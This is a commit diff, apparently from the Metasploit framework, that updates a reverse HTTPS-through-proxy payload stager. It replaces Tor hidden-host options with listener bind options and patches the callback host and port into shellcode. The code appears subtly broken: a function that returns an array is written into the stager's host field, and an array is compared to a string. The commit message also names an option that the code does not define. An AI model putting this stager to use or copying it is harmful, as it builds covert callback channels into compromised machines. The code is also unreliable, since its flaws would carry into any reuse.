Update reverse_https_proxy stager/handler

This change updates the proxy handler code, which for some reason was
ommitted in the orginal commits. This now uses the same mechanism as
the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead
uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
bug/bundler_fix
OJ 2013-11-11 22:21:05 +10:00
parent 12810580d6
commit 063da8a22e
2 changed files with 36 additions and 12 deletions

View File

@ -42,13 +42,17 @@ module ReverseHttpsProxy
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]), OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]), OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]), OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]), OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"]) OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
], Msf::Handler::ReverseHttpsProxy) ], Msf::Handler::ReverseHttpsProxy)
register_advanced_options(
[
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
], Msf::Handler::ReverseHttpsProxy)
end end
end end

View File

@ -134,11 +134,7 @@ module Metasploit3
p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V") p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")
# patch the LPORT # patch the LPORT
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 lport = bind_port
lport = datastore['HIDDENPORT']
else
lport = datastore['LPORT']
end
lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444 lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444
p[lportloc+1] = [lport.to_i].pack('V')[0] p[lportloc+1] = [lport.to_i].pack('V')[0]
@ -148,11 +144,7 @@ module Metasploit3
# append LHOST and return payload # append LHOST and return payload
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? lhost = bind_address
lhost = datastore['HIDDENHOST']
else
lhost = datastore['LHOST']
end
p + lhost.to_s + "\x00" p + lhost.to_s + "\x00"
end end
@ -163,5 +155,33 @@ module Metasploit3
def wfs_delay def wfs_delay
20 20
end end
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end end